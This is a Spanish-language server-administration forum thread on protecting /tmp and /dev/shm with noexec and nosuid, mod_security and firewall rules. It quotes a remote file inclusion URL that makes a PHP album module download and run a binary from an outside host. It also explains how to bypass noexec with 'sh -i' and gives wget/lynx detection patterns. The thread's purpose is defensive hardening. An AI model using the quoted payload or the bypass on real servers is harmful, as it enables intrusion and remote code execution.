proteger el directorio /tmp
 

¿como se puede proteger el directorio /tmp?
es para evitar facilidades a scripts maliciosos.........

Si te defiendes con el inglés, aquí te lo explican con detalle:
http://www.webhostgear.com/34.html

el script siguiente hace lo mismo???

/scripts/securetmp



¿es asi o estoy equivocadao y hay que hacer lo que comenta ese articulo en ingles?


saludos.

Además, del directorio /tmp , te aconsejo que protejas de igual modo la partición /dev/shm que por defecto viene montada en Redhat y Fedora. En esa partición pueden meterte fácilmente scripts maliciosos con el usuario nobody si dejas permisos de ejecución.

Te aconsejo que edites el fichero /etc/fstab , y en la línea

none /dev/shm tmpfs defaults 0 0

añadas noexec,nosuid tras el "defaults", la línea quedaría así:

none /dev/shm tmpfs defaults,noexec,nosuid 0 0

Luego remontas la partición /dev/shm y tendrás más protegido el servidor.

Ten también especial cuidado con directorios de sistema que permitan escribir y ejecutar al usuario "nobody". Generalmente los scripts entran a través de scripts con bugs en PHP, tipo phpNuke, y los suelen ejecutar como nobody.

Espero que esta información te sirva de ayuda para proteger mejor tu servidor :-)

Saludos!

Bienvenido hostalia. Esperamos poder contar con tus valiosos aportes. ¡¡)) :-)

Gracias Eboy. Aunque ando siempre escaso de tiempo, trataré de visitar el foro a menudo para ver si puedo aportar algo :-)

Saludos cordiales!

Aunque es necesario bloquear el /tmp no garantiza la no ejecucion de algun xploit en el servidor.

En resumen hay mil formas de saltarse el noexec del /tmp o ir a otra carpeta, ultimamente he visto en algunos servidor ejecuciones desde /var/spool/samba el sistema es ejecutarlo desde /tmp si aunque lo tengas en noxec como he dicho antes es sencillo saltarselo.

Si creamos un archivo en /tmp lo llamamos test.pl le damos permisos de ejecuon chmod +x test.pl lo ejecutamos ./test.pl nos dira que permiso denegado.

Ahora bien si le decimos sh -i test.pl ya lo tendremos corriendo en nuestro servidor.

Los individuos que se dedican a ir jodiendo servidores se las ingenian como pueden.

Mi consejo es que phpnuke my_egalery album4 etc.. esten al dia actualizados porque si no al final el servidor caera.

Un ejemplo de como subir un archivo al servidor

/modules/4nAlbum/public/displayCategory.php?basepath=http://cheater.idilis.ro/poze/lewl.jpg?&cmd=cd%20/var/tmp;wget%20cheater.idilis.ro/poze/go;chmod%20+x%20go;./go

En este caso el noexec funcionaria, pero el archivo ya esta subido, lo mejor es darle chmod 000 al wget lynx cc para que no puedan subir archivos.

Una buena herramienta es el mod_security es algo dificil de configurar pero es muy efectiva.

Tambien es recomendable hecharle un vistazo a los logs a ver quien es el que sube archivo o desde que web entran.

cd /usr/local/apache/domlogs
grep wget *

O lynx o irc, eggdrop, iroffer etc.

Mantener un servidor no es sencillo, los servidores ahora son muy economicos muchos piensan que un servidor se gestiona desde el panel de control que trae el cpanel ensim o plesk, pero es un gran error y tarden o temprano su servidor es hackeado o cualquier otra cosa.

Perdon por el ladrillo que he soltado ^+$

Totalmente de acuerdo, aunque de lo que se trata es de ir reduciendo la probabilidad de que alguien consiga ejecutar los exploits. Si dejas el directorio /tmp, /var/tmp, /var/spool/samba, /dev/shm, etc, con permisos de ejecución la probabilidad de que cualquier crio con un script automático instale un exploit es mucho mayor que si esos directorios están protegidos. Siempre existirá el riesgo de que si uno de tus clientes alojados instala una versión antigua de PHPNuke y deja directorios con permisos 0777 te lo sigan instalando, pero la probabilidad se reduce.

Lo aconsejable para estos casos es lo siguiente:

1º) Instalar el mod_security en Apache para no permitir URLs con "wget%20", "lynx%20" ó "sh%20", o cualquier regla que pueda proteger frente a guardar ficheros en el servidor de localizaciones remotas.

2º) Instalar unas reglas de firewall que prohiban cualquier tipo de tráfico sospechoso. Generalmente los scripts que un atacante mete "solamente" ejecutan rutinas para abrir backdors en puertos extraños, o incluso realizar ataques DoS contra otras máquinas. Si restringes los puertos que pueden abrirse, aunque consigan instalar el script limitarás su efecto: si instalan un backdoor, no podrán siquiera acceder a él.

Totalmente de acuerdo... nosotros tenemos que luchar a diario para convencer a los clientes que gestionar un servidor no es sólo un panel de control... A la larga van aprendiendo, aunque sea a base de golpes. +]

Saludos!
Gorka Valencia

Muchas gracias Gorka.
Si tienes mas sugerencias sobre administracion de servidores y seguridad, te lo agradezco.
Finalice mis estudios como administrador de sistemas y ahora intento llevar a la practica, ahora mismo uso un vps pero en un futuro me gustaria manejar un servidor con sus dificultades diarias, ahora mismo estoy disponible para hacer practicas en empresas por unos meses para madurar mis conocimientos.

Saludos.